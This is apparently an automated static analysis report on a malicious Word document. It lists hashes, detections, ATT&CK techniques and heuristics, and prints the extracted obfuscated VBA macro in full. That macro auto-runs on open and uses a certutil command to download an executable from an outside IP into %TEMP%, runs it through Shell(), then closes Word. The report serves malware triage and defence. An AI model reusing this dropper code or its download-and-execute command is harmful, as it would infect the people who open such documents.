Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 93ba0d6b33b67267…

MALICIOUS

Office (OOXML)

155.4 KB Created: 2019-07-26 19:51:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-11-20
MD5: 1a7d3e7ed1fab2cec38b5abff85d04d4 SHA-1: da5e1f9ba600b423de069db267ac3257546feee7 SHA-256: 93ba0d6b33b67267a4fc076cb632de12dffc92914adfc4e406a1a0826dec8a27
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro that automatically executes upon opening. This macro utilizes the Shell() function and references cmd.exe, indicating an intent to download and execute a secondary payload. The presence of a Document_Open macro and the use of Shell() are strong indicators of a dropper or downloader malware.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-7083808-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7083808-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    k = "W"
    k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
    End Sub
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            On Error Resume Next
            Set cpJwuFpoD = GetObject(, "Word.Application")
            If Not cpJwuFpoD Is Nothing Then
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
    "ce" & _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Call ewqgqybweryqghd
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://13.75.76.78/andd/Host_outputF07F1DF.exe In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13299 bytes
SHA-256: 77d7c12aa4e52a5363c9821fd6e27335366dcb6061e5059e81af3ac9c8972a14
Detection
ClamAV: No threats found
Obfuscation or payload: likely
140 of 200 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call ewqgqybweryqghd
End Sub

Private Sub ewqgqybweryqghd()

Dim s34 As Object



If 88.2 = 22.2 Then
Else

End If
If 9 = 8 Then

Else


Dim mndmqdvqgfnbc As String
mndmqdvqgfnbc = "erYbnlZE.UOfImlcj"


Dim bbppgbniuxjjys

Application.Run bucvxatybaxwuvrp & mndmqdvqgfnbc & rxzp & trnfcjzm

End If





End Sub




Attribute VB_Name = "erYbnlZE"
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const hvdlurxavndib = 82204

#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const byony = 370
Private Declare PtrSafe Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const ctwbbbzcand = 5
#Else
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const rnlyxbgvoofcwhr = 86

Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kvdcjmiicvywuywp
     qggt As Long
End Type


#If VBA7 Then


#Else


#End If
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zgzy = 4047923

#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const qhy = 96
Private Declare PtrSafe Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const hbltuxsemxvfve = 1
#Else
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const sihp = 10

Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kuyvlkniu
     ibwqueakxygbv As Long
End Type


#If VBA7 Then


#Else


#End If




Public Sub UOfImlcj()

On Error Resume Next




 
    'obgtjgowfezhueyr802ÙÇ©ÆÍ�¸®ã­
'ÜÓ±½â�Ŧ֪?ÖÓ´Èݥéã?¤¦?





 Dim fezhueyr As Integer

  
      
        

'jiukmfkdmmhlkocwxwbzurgq91
'9898





   Dim obgtjgow(317) As String
        obgtjgow(3) = "ÜÓ±½â�Ŧ֪?"
        obgtjgow(5) = "ÖÓ´Èݥéã?¤¦?"
        obgtjgow(1) = "ÙÇ©ÆÍ�¸®ã­"
        obgtjgow(6) = CStr(98)


'mcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'huzwubclbnpzztuebbhyidmkjftpndwymiwqsprwyikxbsygnn
'xcatpqhkedjirjfthquancmxav

   Dim vzcrnewdjr As Variant



'kocwxwbzurgqfezhueyr91
'physuwblvg802
'ttrpbrqycdczlarphysuwblvg4232






 Do Until 4503 = 4503
              Dim huzwubclb As Object
      Randomize
        Loop





        
'802jiukmfkdmmhl
'898
'91fezhueyr
        
        
             If toyvgyg = "ãÖÀÀÏ�¼»Þ??" Then
            Dim tef
            
            toyvgyg = 4071186761114#
        End If
        
        
'brryaisesvmvlkhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'uczntaqbrrwyikxbsygnnpndwymiwqsprwyikxbsygnn



'wifzydvrbmcsiqnxhcwmogzlicmocnvcnhnpzztuebbhyidmk
'pndwymiwqsprwyikxbsygnnpndwymiwqsprwyikxbsygnn
'hquancmxavuczntaqbrrwyikxbsygnn


    Select Case 37
            Case Else
        End Select




'jiukmfkdmmhl
'tefphysuwblvg#Q14
'toyvgyg
'4232physuwblvg



        
        Dim akomhxtxmqvo, brwyikxbsygnn, czyhglqygod
For akomhxtxmqvo = 802 To 802 Step -1
czyhglqygod = 98
        Next akomhxtxmqvo
        

         Dim aryxmwwhhvnlwm As String


        'komhxtxmqvojftjftrwyikxbsygnnhquancmxav
'rwyikxbsygnnhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'zyhglqygodrwyikxbsygnnrwyikxbsygnnhquancmxav
'npzztuebbhyidmkmcsiqnxhcwmogzlbrryaisesvmvlkhquancmxav
'jftmcsiqnxhcwmogzluczntaqbrrwyikxbsygnn



        
        If IsDate(qdbkwpqnvxz) And ((8 + 802) / (4232 + 374369518)) <> 162384288395110# Then
          wlb = "hjqag" & CStr("unuunwwbutw")
End If
        





'mywvdwycjftbrryaisesvmvlkhquancmxav
'icmocnvcnhnpzztuebbhyidmkbrryaisesvmvlkhquancmxav
'ÙÇ©ÆÍ�¸®ã­Q14
'ÖÓ´Èݥéã?¤¦?Q11

 
    'sdcypwcfnwzqpwlzioo73921134ëÕ¨ËѤƼé®
'ÚשÎß�¿ÞÖ¸Ê





 Dim ioo As Integer

  
      
        

'ojlomawbtymo35165612
'2121





   Dim sdcypwcfnwzqpwlz(444) As String
        sdcypwcfnwzqpwlz(7) = "ÚשÎß�¿"
        sdcypwcfnwzqpwlz(5) = "ÞÖ¸Ê"
        sdcypwcfnwzqpwlz(4) = "ëÕ¨ËѤƼé®"
        sdcypwcfnwzqpwlz(4) = CStr(21)


'lgcdppnjxvesnjmmcmpavbfsemx
'egyiswtzlehbvfxxqnsazndbclmppnjxvesnjmmcmpavbfsemx
'jgcmgtnlximaaysazndbclmixctlkegikai

   Dim bxyapoajyjw As Variant



'omawbtymoioo35165612
'sfnxcptgvlezxmvg73921134
'nuxaexibgvxyldcsfnxcptgvlezxmvg65282






 Do Until 1182 = 1182
              Dim egyiswtzlehb As Object
      Randomize
        Loop





        
'73921134ojl
'136794321
'35165612ioo
        
        
             If uuyouhtsoshdoxn = "âľÉÍ" Then
            Dim gdg
            
            uuyouhtsoshdoxn = 93499963983#
        End If
        
        
'diqsixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'cwftpamgypavbfsemxppnjxvesnjmmcmpavbfsemx



'spdahaklclgcdcwlgnadzynenfvfxxqn
'ppnjxvesnjmmcmpavbfsemxppnjxvesnjmmcmpavbfsemx
'ixctlkegikaicwftpamgypavbfsemx


    Select Case 40
            Case Else
        End Select




'ojl
'gdgsfnxcptgvlezxmvg#Q14
'uuyouhtsoshdoxn
'65282sfnxcptgvlezxmvg



        
        Dim adiyh, bpavbfsemx, ckfs
For adiyh = 73921134 To 73921134 Step -1
ckfs = 21
        Next adiyh
        

         Dim drhdbarmcmqhnemh As String


        'diyhsazndbclmsazndbclmpavbfsemxixctlkegikai
'pavbfsemxixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'kfspavbfsemxpavbfsemxixctlkegikai
'vfxxqnlgcddiqsixctlkegikai
'sazndbclmlgcdcwftpamgypavbfsemx



        
        If IsDate(wpsavvjh) And ((1367943 + 73921134) / (65282 + 7321042)) <> 3937242557207# Then
          nurmv = "zbudto" & CStr("lpriufnalxwfve")
End If
        





'cnnobwhnvvxsazndbclmdiqsixctlkegikai
'cwlgnadzynenfvfxxqndiqsixctlkegikai
'ëÕ¨ËѤƼé®Q14
'ÞÖ¸ÊQ11





If "DiUdvYYkaXFlJStAUnlrdpbLm" = "YBbYhDxeMgaOgBUysdJrVrLP" Then
gRiANHJrTzXJCpBn = "FNaFHkXewyBuGgqLHBmOeyZQXM"
wp = "oHDqlypMZgLWQIHwNThxuoOYAGnJhujaoGKu"
QurWucFDHiQJbzhPsvAsfpeKfeexkhKyNFxY = 6.22257731574995E+33
End If





Do Until "bZbbQeJFnxrREAVXsLyLtZJRbOh" <> "CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt"
sXhb = "lUTeGuMxcZbBKfZuMpKhLNVgbfNJgbFEQMg"
jlDFpAldxBUnTJfi = 373456919159794#
udYymCahDQAUXlxzHLbl = "sLbrj"
LZpXvWhVjHTxicYljkJZQW = 28934
MyEwRBSwHCdPINtFxqPOroNsIgGbriJJokd = "raPTQLMuFNQXqeMjAHxXkL"
lvrEYtUaXkUOWavygcTnvQikNVZIhmFpf = 3.23840053692693E+29
eYYGnAkmsnVQpJEJRvQXrVMGrDULtlefi = 6.81339610724978E+20
vXZZpTCJXuPwgPEXUKYIvJMSOjgZtG = 2.9383642571979E+42
qiGOhkrFx = "ixRrvWFHVQTGanmKHL"
mdPQlY = "aAXndEbnMLuaT"
bRXqpjIScWdg = 4.00053506930871E+25
bZbbQeJFnxrREAVXsLyLtZJRbOh = CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt
Loop








Do While 654 < 2
   Select Case mrjbvyvrrtenqmi
            Case "éзÀà�´¦í?¡??¦É¬", "ÓȾÆÞ?Ĺ֣??", "ßźÂà?®´á?"
               zxcbnmmf1 = "àÄ®ÁÝ¥µ¦Ö£???¿"
            Case "ÛÚ©", "àʨÎÔ¥ºµÙ?�?¥"
               zxcbnmmf2 = "ØÓºÔ"
            Case "ÛÖ¿¾Ð?»«ë®¡", "ÝϧÏÖ?³"
                zxcbnmmf3 = "ìȵÐ"
            Case Else
               zxcbnmmf4 = "soaixylctbkejfr"
    End Select

Exit Do
Randomize
Loop



Dim jepemzlaqkbwp As String
Dim xuhbj As Integer


xuhbj = 4364
jepemzlaqkbwp = "3RLivxKEmgZ2X1Fi"





Do While 847 < 7
   Select Case oveebpdbvzlgoat
            Case "à̬ÈÖ?Æ©ç¢", "ÛÖÀÇÍ?", "âöÁÒ£¹"
               zxcbnmmf1 = "ëÌ­½Ê?Ʀæ??"
            Case "ÜÙ¹¿â¤¯¬", "éÖ«Èѣ¥è§?"
               zxcbnmmf2 = "äÛ´Åß?º¥"
            Case "ÞÒ»ÈÝ?°²", "ÕʸÂÒ?Á¹Ø©??"
                zxcbnmmf3 = "ÓмÏÞ?"
            Case Else
               zxcbnmmf4 = "qfuifr"
    End Select

Exit Do
Randomize
Loop



Dim nyzsktufmsu As String
Dim xghe As Integer


xghe = 4364
nyzsktufmsu = "3RLivxKEmgZ2X1Fi"








If 9324.234 + 2345.23 = 23566.2 Then

Else

lop = "tes098ll65435467889654356786543535353534534553453543535354ce1"
lop = Right(Left(lop, 8), 0.005 * 101)
lop1 = "tes098ce65435467889654356786543535353534534553453543535354ce1"
'lop = lop + Right(Left(lop1, 8), 0.005 * 200)

pol = Mid("sd98567879865432234567899765432gdc8e9895", 0.004 * 49911)
pol = lop



End If


a = Left("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1)
'Right function
b = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzH", 1)


f = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzT", 1)

'Mid function
c = Mid("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1, 11)
'Split function
d = Split("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next


vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
"ce" & _
"rtuti" & pol & _
" " & _
"-urlcache" & _
" " & _
"-split" & _
" " & _
"-f" & _
" " & _
"http://13.75.76.78/andd/Host_outputF07F1DF.exe" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif" & _
"&" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif"



zmeqzvkwmnyx (vzurddc)




Do Until "ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp" <> "oEBBpgIqSBhjPsU"
eluQ = 1.08325364430548E+19
lgHA = "vAQOpjbygHNMdbTaTrsJy"
dRDOfZNCYtASkIZDLxHQLNpRHSwdRoP = "ZLWzKbECkeiULLqKAPguChZQclHMckkkeKtZ"
ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp = oEBBpgIqSBhjPsU
Loop

 While "dMhLjRyFwxOVLroCTSXj" = "LmiMZQdgtCkwD"
kPEcABZdSrpIFCfdvvyIRZzyKBVYDveZIzEmO = "XinhTqXRLaAPGpxuZKQGRyfBZXNQzFytPFX"
VkFIbtquXooobOZ = "WIXZCmHwdGRFcHzBRgZpFHeYHkdliYolfEWGiy"
icIfUbkSPpnWu = "koPeyRRIWNESfaXlsSTTqMwbJxXSNwvBtwu"
GcjgvZGvbCvKuew = "DbyXrnUBuzuaRCYifH"
PinXQGBAHBMYjzaySyWYTIimwf = 6.7326294951552E+28
dYdMemzglPDiRqnMAhbLarDGkIiL = 4.23992557355971E+17
ABblZXb = 308547930842765#
Wend




EkeQQxZa

End Sub




Private Sub EkeQQxZa()
   Dim cpJwuFpoD As Object

    Do
        On Error Resume Next
        Set cpJwuFpoD = GetObject(, "Word.Application")
        If Not cpJwuFpoD Is Nothing Then
            cpJwuFpoD.Quit
            Set cpJwuFpoD = Nothing
        End If
    Loop Until cpJwuFpoD Is Nothing

End Sub







Sub zmeqzvkwmnyx(StFmCsaKO As String)
While "wMdIKSkVAhsxAH" = "obHtnbgiOMbDU"
bZdwYIHwoqxFGVEEHBhihQVQjoPePwiPQbZHOA = 8.88143014062935E+30
yGrmQvhULeJFZVlMKENNksdh = "HipewwqGZicpeEUBTEzFrItePOCBnrGcKuJNr"
OhTyAmJXgAtMQodbByoLPiuoShczekvGJdqR = "sIHVrhCHbbRyjtKZgagnefTKJswFmCnx"
pIqhqXArgrG = 6.11922130360933E+20
Wend
k = "W"
k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 37888 bytes
SHA-256: 0e289b33430de45c0cef680ce4b213b40b29ee1bb03be350aecdcacdb414c9dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
322 of 489 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).